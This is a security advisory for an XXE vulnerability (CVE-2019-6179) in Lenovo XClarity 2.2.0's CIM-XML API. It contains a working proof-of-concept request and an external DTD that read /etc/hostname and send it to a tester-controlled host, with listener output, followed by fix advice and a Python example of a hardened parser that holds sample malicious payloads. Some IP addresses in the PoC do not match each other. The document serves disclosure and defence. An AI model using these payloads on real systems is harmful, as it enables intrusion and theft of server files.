usd-2019-0045 | XClarity 2.2.0
Advisory ID: usd-2019-0045
CVE Number: CVE-2019-6179
Affected Product: XClarity
Affected Version: 2.2.0
Vulnerability Type: XML External Entity Processing
Security Risk: Critical
Vendor URL: https://www.lenovo.com/
Vendor Status: Fixed
Vendor Advisory: https://support.lenovo.com/de/de/solutions/len-27805
Description
The appliance exposes a CIM API (CIM-XML over HTTP) on port 9090 that is vulnerable to XML External Entity (XXE) injection: the XML parser behind it resolves external entities declared in a request's DTD.
Proof of Concept (PoC)
Request:
POST /cimom HTTP/1.1
Host: 10.10.10.4:9090
Accept-Encoding: gzip, deflate
Content-type: application/xml; charset="utf-8"
Content-Length: 503
CIMOperation: MethodCall
CIMObject: root/cimv2
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE CIM [
<!ELEMENT CIM ANY >
<!ENTITY % sp SYSTEM "http://10.10.80.241/test.xml">
%sp;
%param1;
]>
<CIM CIMVERSION="2.0" DTDVERSION="2.0">
  <MESSAGE ID="1001" PROTOCOLVERSION="1.0">
    <SIMPLEREQ>&exfil;
      <IMETHODCALL NAME="EnumerateInstances">
        <LOCALNAMESPACEPATH>
          <NAMESPACE NAME="root"/>
          <NAMESPACE NAME="cimv2"/>
        </LOCALNAMESPACEPATH>
        <IPARAMVALUE NAME="ClassName">
          <CLASSNAME NAME="CIM_ComputerSystem"/>
        </IPARAMVALUE>
      </IMETHODCALL>
    </SIMPLEREQ>
  </MESSAGE>
</CIM>

Response:
HTTP/1.1 400 Bad Request
Content-Type: application/xml;charset="utf-8"
Content-length: 0
Connection: close
Meanwhile on the listener (an HTTP server on the pentester's host), the appliance fetches the external DTD and then sends the content of /etc/hostname in a second request:
pentester:~/www$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.32 - - [24/May/2019 15:27:00] "GET /test.xml HTTP/1.0" 200 -
10.10.10.32 - - [24/May/2019 15:27:00] "GET /?localhost HTTP/1.0" 200 -

Content of test.xml:
<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.241/?%data;'>">
Fix
Disable external entity processing (and DTD processing in general) in the XML parser if possible, or restrict access to the API to authenticated users.
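The mitigation above, illustrated as an added example that is not part of the advisory or of Lenovo's XClarity code: a CIM-XML request handler written against Python's standard-library expat bindings, configured so that parameter entities are never expanded, external entities are never resolved, and a DOCTYPE is rejected outright by default. The advisory does not identify which parser the appliance uses, so this is a generic illustration; the sample request bodies and the attacker.example host are constructed.

```python
"""Hardened handling of CIM-XML request bodies.

Added example, not XClarity code. Uses only the standard-library expat
bindings; sample payloads and hosts below are constructed placeholders.
"""
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """Raised when a request body uses DTD features a CIM-XML call never needs."""


def parse_cim_request(body: bytes, allow_doctype: bool = False) -> dict:
    """Parse a CIM-XML MethodCall and return the method and class it targets.

    The parser is configured so that no external resource (file:// or http://)
    is ever fetched, whatever the DTD declares.
    """
    parser = expat.ParserCreate()

    # Layer 1: never expand parameter entities (the %sp; / %param1; pattern),
    # so an external DTD is never retrieved and cannot inject entities.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    # Layer 2: a CIM-XML request has no legitimate need for a DOCTYPE, so by
    # default the document is refused as soon as one appears.
    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_doctype:
            raise UnsafeXML(f"DOCTYPE {name!r} not permitted in CIM-XML requests")
    parser.StartDoctypeDeclHandler = on_doctype

    # Layer 3: even when a DTD is tolerated, refuse to resolve any external
    # general entity instead of opening the referenced URL or file.
    def on_external_entity(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity {sysid!r} not permitted")
    parser.ExternalEntityRefHandler = on_external_entity

    result = {"method": None, "class": None}

    def on_start(tag, attrs):
        if tag == "IMETHODCALL":
            result["method"] = attrs.get("NAME")
        elif tag == "CLASSNAME":
            result["class"] = attrs.get("NAME")
    parser.StartElementHandler = on_start

    parser.Parse(body, True)  # raises expat.ExpatError on malformed XML
    return result


def is_acceptable(body: bytes) -> bool:
    """Yes/no gate suitable for a reverse proxy in front of the CIM port."""
    try:
        parse_cim_request(body)
        return True
    except (UnsafeXML, expat.ExpatError):
        return False


# Constructed sample bodies. BENIGN is a plain EnumerateInstances call;
# MALICIOUS mirrors the shape of the advisory's PoC (external parameter entity
# in the DTD) with a placeholder host; FILE_ENTITY uses a direct external
# general entity to exercise the third layer on its own.
BENIGN = (b'<?xml version="1.0" encoding="utf-8"?>'
          b'<CIM CIMVERSION="2.0" DTDVERSION="2.0">'
          b'<MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ>'
          b'<IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH>'
          b'<NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH>'
          b'<IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="CIM_ComputerSystem"/>'
          b'</IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>')

MALICIOUS = (b'<?xml version="1.0" encoding="utf-8"?>'
             b'<!DOCTYPE CIM [ <!ELEMENT CIM ANY >'
             b'<!ENTITY % sp SYSTEM "http://attacker.example/test.xml"> %sp; %param1; ]>'
             b'<CIM CIMVERSION="2.0" DTDVERSION="2.0">'
             b'<MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ>&exfil;'
             b'<IMETHODCALL NAME="EnumerateInstances"></IMETHODCALL>'
             b'</SIMPLEREQ></MESSAGE></CIM>')

FILE_ENTITY = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE CIM [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
               b'<CIM CIMVERSION="2.0" DTDVERSION="2.0">'
               b'<MESSAGE ID="1" PROTOCOLVERSION="1.0"><SIMPLEREQ>&xxe;'
               b'</SIMPLEREQ></MESSAGE></CIM>')


if __name__ == "__main__":
    print("benign   :", parse_cim_request(BENIGN))
    for label, body in (("malicious", MALICIOUS), ("file entity", FILE_ENTITY)):
        print(f"{label:11}: accepted={is_acceptable(body)}")
```

The three layers are deliberately redundant: in a parser that cannot be switched to reject DOCTYPEs, disabling parameter-entity parsing alone already defeats the advisory's two-stage payload, because `%sp;` is never fetched and `%param1;` is never defined; the external-entity handler covers the remaining case of a directly declared `SYSTEM` entity.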
Timeline
- 2019-05-27 First contact request via email@example.com
- 2019-09-03 Lenovo discloses advisory at https://support.lenovo.com/de/de/solutions/len-27805
- 2019-10-21 First published
Credits
This security vulnerability was found by Tobias Neitzel of usd AG.
ABOUT usd SECURITY ADVISORIES
In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.
Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.
Always for the sake of our mission: „more security.“
In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.
The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.